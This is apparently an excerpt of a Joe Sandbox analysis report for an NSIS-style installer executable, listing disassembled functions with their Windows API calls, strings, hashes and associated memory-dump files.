Associated: 00000000.00000002.3669634714.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669729745.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_eAvqHiIsgR.jbxd

Similarity

API ID: Char$Next$Prev
String ID: "C:\Users\user\Desktop\eAvqHiIsgR.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
API String ID: 589700163-3545221309
Opcode ID: 6d9cd5a565d063f7c871d931481108c2ccc59b6be6080685bd61ccbc84ff8956
Instruction ID: ed52d7626cbd5fe55056ecced6ac67fd73520a103458dc51ec5e44788bc33e0d
Opcode Fuzzy Hash: 6d9cd5a565d063f7c871d931481108c2ccc59b6be6080685bd61ccbc84ff8956
Instruction Fuzzy Hash: 6B1104518047A169FB3207380C40B7B7F888B97764F1A447FE8C6722C2C67C5CA796AD

Function 00402DBA Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 40timeCOMMON

Download Yara Rule

APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402DD5
MulDiv.KERNEL32(000D61EF,00000064,000D77A8), ref: 00402E00
wsprintfA.USER32 ref: 00402E10
SetWindowTextA.USER32(?,?), ref: 00402E20
SetDlgItemTextA.USER32(?,00000406,?), ref: 00402E32

Strings

a, xrefs: 00402DEB
verifying installer: %d%%, xrefs: 00402E0A

Memory Dump Source

Source File: 00000000.00000002.3669603090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3669584208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669619351.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669729745.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_eAvqHiIsgR.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: verifying installer: %d%%$a
API String ID: 1451636040-323253276
Opcode ID: 79fc7e6e1ca0acae8e9a75e18e021abc494deab029f93f770ff90eafb88ab8ab
Instruction ID: 65898b716c6b5e3943ed5d7f8865a7929710e3ce64d80c757a7a8fa3a9c1cc58
Opcode Fuzzy Hash: 79fc7e6e1ca0acae8e9a75e18e021abc494deab029f93f770ff90eafb88ab8ab
Instruction Fuzzy Hash: BD01FF70640209FBEF20AF60DE4AEEE3769AB14345F008039FA06A51D0DBB59D55DB59

Function 004041E2 Relevance: 12.1, APIs: 8, Instructions: 68COMMON

Download Yara Rule

APIs

GetWindowLongA.USER32(?,000000EB), ref: 004041FF
GetSysColor.USER32(00000000), ref: 0040423D
SetTextColor.GDI32(?,00000000), ref: 00404249
SetBkMode.GDI32(?,?), ref: 00404255
GetSysColor.USER32(?), ref: 00404268
SetBkColor.GDI32(?,?), ref: 00404278
DeleteObject.GDI32(?), ref: 00404292
CreateBrushIndirect.GDI32(?), ref: 0040429C

Memory Dump Source

Source File: 00000000.00000002.3669603090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3669584208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669619351.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669729745.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_eAvqHiIsgR.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: dc1d3e55db8ec23378b3830e5d111dcc895b5f12cd74b581ce4b7be4d8059b2f
Instruction ID: 212a8ad98d70f233ee07b83b669a1ba7ccffb4b50a3226e4c630c70d8ffb5278
Opcode Fuzzy Hash: dc1d3e55db8ec23378b3830e5d111dcc895b5f12cd74b581ce4b7be4d8059b2f
Instruction Fuzzy Hash: 3B2165716007059BCB309F78DD08B5BBBF4AF85750B04896EFD96A22E0C738E814CB54

Function 72A424D8 Relevance: 10.6, APIs: 7, Instructions: 124COMMON

Download Yara Rule

APIs

Part of subcall function 72A41215: GlobalAlloc.KERNEL32(00000040,72A41233,?,72A412CF,-72A4404B,72A411AB,-000000A0), ref: 72A4121D

GlobalFree.KERNEL32(?), ref: 72A425DE
GlobalFree.KERNEL32(00000000), ref: 72A42618

Memory Dump Source

Source File: 00000000.00000002.3692894064.0000000072A41000.00000020.00000001.01000000.00000005.sdmp, Offset: 72A40000, based on PE: true

Associated: 00000000.00000002.3692870436.0000000072A40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.3692910209.0000000072A43000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.3692981384.0000000072A45000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72a40000_eAvqHiIsgR.jbxd

Similarity

API ID: Global$Free$Alloc
String ID:
API String ID: 1780285237-0
Opcode ID: 95be83d9363dcee22d4462419e02f1764b615dac61a69ad94b7d316b55df3dca
Instruction ID: e70830655917d2c5be2fe1f5566c8aa433948f9bf51b51f2aa3d9232711706ac
Opcode Fuzzy Hash: 95be83d9363dcee22d4462419e02f1764b615dac61a69ad94b7d316b55df3dca
Instruction Fuzzy Hash: 6F41BF72944200EFD302CF5DCCA4D2ABBFAEBC9344B20592DF50297118DB3AE915CB62

Function 0040521E Relevance: 10.6, APIs: 7, Instructions: 73stringwindowCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(0042A070,00000000,00424248,759223A0,?,?,?,?,?,?,?,?,?,00403233,00000000,?), ref: 00405257
lstrlenA.KERNEL32(00403233,0042A070,00000000,00424248,759223A0,?,?,?,?,?,?,?,?,?,00403233,00000000), ref: 00405267
lstrcatA.KERNEL32(0042A070,00403233,00403233,0042A070,00000000,00424248,759223A0), ref: 0040527A
SetWindowTextA.USER32(0042A070,0042A070), ref: 0040528C
SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004052B2
SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004052CC
SendMessageA.USER32(?,00001013,?,00000000), ref: 004052DA

Memory Dump Source

Source File: 00000000.00000002.3669603090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3669584208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669619351.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669729745.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_eAvqHiIsgR.jbxd

Similarity

API ID: MessageSend$lstrlen$TextWindowlstrcat
String ID:
API String ID: 2531174081-0
Opcode ID: ffc7fd16b0850e8ca78275056b27aa311aff222ca9cd1cb1225c1906ca535124
Instruction ID: 52f605d016cfd88bb70700c5a478074e15cc738f975766ab4ed8c3314b346ff2
Opcode Fuzzy Hash: ffc7fd16b0850e8ca78275056b27aa311aff222ca9cd1cb1225c1906ca535124
Instruction Fuzzy Hash: C721AC71900518BBDF119FA5DD8599FBFA8EF04354F1480BAF804B6291C7798E50CF98

Function 00404ACE Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 00404AE9
GetMessagePos.USER32 ref: 00404AF1
ScreenToClient.USER32(?,?), ref: 00404B0B
SendMessageA.USER32(?,00001111,00000000,?), ref: 00404B1D
SendMessageA.USER32(?,0000110C,00000000,?), ref: 00404B43

Strings

f, xrefs: 00404B1F

Memory Dump Source

Source File: 00000000.00000002.3669603090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3669584208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669619351.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669729745.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_eAvqHiIsgR.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: fae6ee4ef260730fd0e6baeb46c05ac4d0d99299cd6b7910a3b5b88b2e21feb9
Instruction ID: cdc5f22e578355ebae6afd16dcadc4be4e42c2ab1ff41a6041c2d58f87c209b7
Opcode Fuzzy Hash: fae6ee4ef260730fd0e6baeb46c05ac4d0d99299cd6b7910a3b5b88b2e21feb9
Instruction Fuzzy Hash: 33014C71900219BADB01DBA4DD85BFEBBBCAF55715F10012ABA40B61D0D6B4A9018BA4

Function 72A422F1 Relevance: 9.1, APIs: 6, Instructions: 140memoryCOMMON

Download Yara Rule

APIs

GlobalFree.KERNEL32(00000000), ref: 72A42447

Part of subcall function 72A41224: lstrcpynA.KERNEL32(00000000,?,72A412CF,-72A4404B,72A411AB,-000000A0), ref: 72A41234

GlobalAlloc.KERNEL32(00000040,?), ref: 72A423C2
MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 72A423D7
GlobalAlloc.KERNEL32(00000040,00000010), ref: 72A423E8
CLSIDFromString.OLE32(00000000,00000000), ref: 72A423F6
GlobalFree.KERNEL32(00000000), ref: 72A423FD

Memory Dump Source

Source File: 00000000.00000002.3692894064.0000000072A41000.00000020.00000001.01000000.00000005.sdmp, Offset: 72A40000, based on PE: true

Associated: 00000000.00000002.3692870436.0000000072A40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.3692910209.0000000072A43000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.3692981384.0000000072A45000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72a40000_eAvqHiIsgR.jbxd

Similarity

API ID: Global$AllocFree$ByteCharFromMultiStringWidelstrcpyn
String ID:
API String ID: 3730416702-0
Opcode ID: 053bb35beb8607a368195d04b321f52d0ebdda831a5f13a0b9ed869718887074
Instruction ID: b7bf739d5a6721e73721afbeb160c8832fd60a1b07f1304b2eb4fcdc9f75e1e7
Opcode Fuzzy Hash: 053bb35beb8607a368195d04b321f52d0ebdda831a5f13a0b9ed869718887074
Instruction Fuzzy Hash: 404199B2904300EFD3118F2CD984B2ABBF8FB84315F20696EE846C6198DB30E955CF61

Function 004027DF Relevance: 9.1, APIs: 6, Instructions: 86memoryfileCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 00402833
GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,000000F0), ref: 0040284F
GlobalFree.KERNEL32(?), ref: 0040288E
GlobalFree.KERNEL32(00000000), ref: 004028A1
CloseHandle.KERNEL32(?,?,?,?,000000F0), ref: 004028B9
DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 004028CD

Memory Dump Source

Source File: 00000000.00000002.3669603090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3669584208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669619351.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669729745.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_eAvqHiIsgR.jbxd

Similarity

API ID: Global$AllocFree$CloseDeleteFileHandle
String ID:
API String ID: 2667972263-0
Opcode ID: e200f0a06a1b791de6fcd90df19bdd9ae0c902d0d002ce7977cb24af33c736ef
Instruction ID: 50ad9526884773a844389ca9465edd1da2989015e588fa45899e7f45ead5980e
Opcode Fuzzy Hash: e200f0a06a1b791de6fcd90df19bdd9ae0c902d0d002ce7977cb24af33c736ef
Instruction Fuzzy Hash: 78216D72800128BBDF217FA5CE49D9E7A79EF09364F24423EF550762D1CA794D418FA8

Function 72A41837 Relevance: 7.7, APIs: 5, Instructions: 194COMMON

Download Yara Rule

APIs

GlobalFree.KERNEL32(?), ref: 72A41893
GlobalFree.KERNEL32(?), ref: 72A41A2A
GlobalFree.KERNEL32(?), ref: 72A41A2F

Memory Dump Source

Source File: 00000000.00000002.3692894064.0000000072A41000.00000020.00000001.01000000.00000005.sdmp, Offset: 72A40000, based on PE: true

Associated: 00000000.00000002.3692870436.0000000072A40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.3692910209.0000000072A43000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.3692981384.0000000072A45000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72a40000_eAvqHiIsgR.jbxd

Similarity

API ID: FreeGlobal
String ID:
API String ID: 2979337801-0
Opcode ID: 04d0138f6b039cfa8a9ae31b9a43d0b8901eade0a551f12f161ca9fbc274c8dc
Instruction ID: 7b04ab45c90008d59928255ff0bd86f27f0ee3e0cc081a618f74c5a3e6f485b2
Opcode Fuzzy Hash: 04d0138f6b039cfa8a9ae31b9a43d0b8901eade0a551f12f161ca9fbc274c8dc
Instruction Fuzzy Hash: 2B51D572D44158AEDB128FBCC9846ADBFB5AB48349F34316BD406E315DCF31D9428761

Function 00401D65 Relevance: 7.6, APIs: 5, Instructions: 75windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,?), ref: 00401D7E
GetClientRect.USER32(?,?), ref: 00401DCC
LoadImageA.USER32(?,?,?,?,?,?), ref: 00401DFC
SendMessageA.USER32(?,00000172,?,00000000), ref: 00401E10
DeleteObject.GDI32(00000000), ref: 00401E20

Memory Dump Source

Source File: 00000000.00000002.3669603090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3669584208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669619351.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669729745.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_eAvqHiIsgR.jbxd

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: 64047181dbb11954f6248d6d4ebce6329301936260590e1bb013e11241bca830
Instruction ID: ea2313c62ec258575502bac7b5a91221d1b2f7c42d1e166e88532b570a834240
Opcode Fuzzy Hash: 64047181dbb11954f6248d6d4ebce6329301936260590e1bb013e11241bca830
Instruction Fuzzy Hash: 02212872A00109AFCB15DFA4DD85AAEBBB5EB48300F24417EF905F62A1DB389941DB54

Function 004049C4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(0042A890,0042A890,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004048DF,000000DF,00000000,00000400,?), ref: 00404A62
wsprintfA.USER32 ref: 00404A6A
SetDlgItemTextA.USER32(?,0042A890), ref: 00404A7D

Strings

%u.%u%s%s, xrefs: 00404A4C

Memory Dump Source

Source File: 00000000.00000002.3669603090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3669584208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669619351.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669729745.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_eAvqHiIsgR.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s
API String ID: 3540041739-3551169577
Opcode ID: 5f94da5c7593bdf0e2880c0754fbf5196b9ea6ae0f0d3d8572f030c1a72350cb
Instruction ID: 22449cd78037b5055574fdfa12b268b27ceb02c465c900d7a820e94443fbddbc
Opcode Fuzzy Hash: 5f94da5c7593bdf0e2880c0754fbf5196b9ea6ae0f0d3d8572f030c1a72350cb
Instruction Fuzzy Hash: 1911E773A041243BDB00A56D9C41EAF3298DF81374F260237FA26F71D1E979CC1246A9

Function 00405A8F Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403335,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 00405A95
CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403335,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 00405A9E
lstrcatA.KERNEL32(?,0040A014,?,00000007,00000009,0000000B), ref: 00405AAF

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405A8F

Memory Dump Source

Source File: 00000000.00000002.3669603090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3669584208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669619351.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669729745.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_eAvqHiIsgR.jbxd

Similarity

API ID: CharPrevlstrcatlstrlen
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 2659869361-823278215
Opcode ID: 7e3bd0a74015a4b4c7bd8f32b9337ec82444728bd267b6e5413a6877d2367a50
Instruction ID: 6078a555604e81c1816c45b3e60b5c3e7c31ed84b02af53c952a19e53ba35867
Opcode Fuzzy Hash: 7e3bd0a74015a4b4c7bd8f32b9337ec82444728bd267b6e5413a6877d2367a50
Instruction Fuzzy Hash: 68D0A7B26055307AE21126155C06ECB19488F463447060066F500BB193C77C4C114BFD

Function 00402E3D Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000,00000000,0040301B,00000001), ref: 00402E50
GetTickCount.KERNEL32 ref: 00402E6E
CreateDialogParamA.USER32(0000006F,00000000,00402DBA,00000000), ref: 00402E8B
ShowWindow.USER32(00000000,00000005), ref: 00402E99

Memory Dump Source

Source File: 00000000.00000002.3669603090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3669584208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669619351.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669729745.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_eAvqHiIsgR.jbxd

Similarity

API ID: Window$CountCreateDestroyDialogParamShowTick
String ID:
API String ID: 2102729457-0
Opcode ID: 8c1e1bd8efa9ab411d4161537fee885c8283498bc89c51da2617a800704498c9
Instruction ID: cc5f9dcce599e9be0c1e5b41ef6f72156ec830c1ee92694e4cf82ced2ffe4824
Opcode Fuzzy Hash: 8c1e1bd8efa9ab411d4161537fee885c8283498bc89c51da2617a800704498c9
Instruction Fuzzy Hash: B6F05E30A45630EBC6317B64FE4CA8B7B64BB44B45B91047AF045B22E8C6740C83CBED

Function 00405B7D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46stringCOMMON

Download Yara Rule

APIs

Part of subcall function 004060F7: lstrcpynA.KERNEL32(?,?,00000400,0040341A,sprjtelakeringer Setup,NSIS Error,?,00000007,00000009,0000000B), ref: 00406104

Part of subcall function 00405B28: CharNextA.USER32(?,?,0042BC98,?,00405B94,0042BC98,0042BC98,75923410,?,C:\Users\user\AppData\Local\Temp\,004058DF,?,75923410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405B36
Part of subcall function 00405B28: CharNextA.USER32(00000000), ref: 00405B3B
Part of subcall function 00405B28: CharNextA.USER32(00000000), ref: 00405B4F

lstrlenA.KERNEL32(0042BC98,00000000,0042BC98,0042BC98,75923410,?,C:\Users\user\AppData\Local\Temp\,004058DF,?,75923410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405BD0
GetFileAttributesA.KERNEL32(0042BC98,0042BC98,0042BC98,0042BC98,0042BC98,0042BC98,00000000,0042BC98,0042BC98,75923410,?,C:\Users\user\AppData\Local\Temp\,004058DF,?,75923410,C:\Users\user\AppData\Local\Temp\), ref: 00405BE0

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405B7D

Memory Dump Source

Source File: 00000000.00000002.3669603090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3669584208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669619351.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669729745.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_eAvqHiIsgR.jbxd

Similarity

API ID: CharNext$AttributesFilelstrcpynlstrlen
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 3248276644-823278215
Opcode ID: e638d3577084fc0f37fd401aa5ef1a5930802456fef8e272e5ea6ea3ca1dc2da
Instruction ID: a7953992a1868a2a025aeaadbe30fe94b9837340da5d1ec43b16535858986a89
Opcode Fuzzy Hash: e638d3577084fc0f37fd401aa5ef1a5930802456fef8e272e5ea6ea3ca1dc2da
Instruction Fuzzy Hash: 6DF02821105E6116D222323A1C05AAF3A74CE82364715013FF862B22D3CF7CB9139DBE

Function 00405192 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 004051C1
CallWindowProcA.USER32(?,?,?,?), ref: 00405212

Part of subcall function 004041C7: SendMessageA.USER32(00000000,00000000,00000000,00000000), ref: 004041D9

Strings

, xrefs: 004051A2

Memory Dump Source

Source File: 00000000.00000002.3669603090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3669584208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669619351.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669729745.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_eAvqHiIsgR.jbxd

Similarity

API ID: Window$CallMessageProcSendVisible
String ID:
API String ID: 3748168415-3916222277
Opcode ID: 9af3a59599e8879c459ffb9579ce68eec3d4baecce8abe749bc9c6a9b619fe8d
Instruction ID: 7056b910bbb205cd539ea3acc8ab51e06e0639846daa80cdaddfd33d10a348e5
Opcode Fuzzy Hash: 9af3a59599e8879c459ffb9579ce68eec3d4baecce8abe749bc9c6a9b619fe8d
Instruction Fuzzy Hash: 47017171200609ABEF20AF11DD80A5B3666EB84354F14413AFB107A1D1C77A8C62DE6E

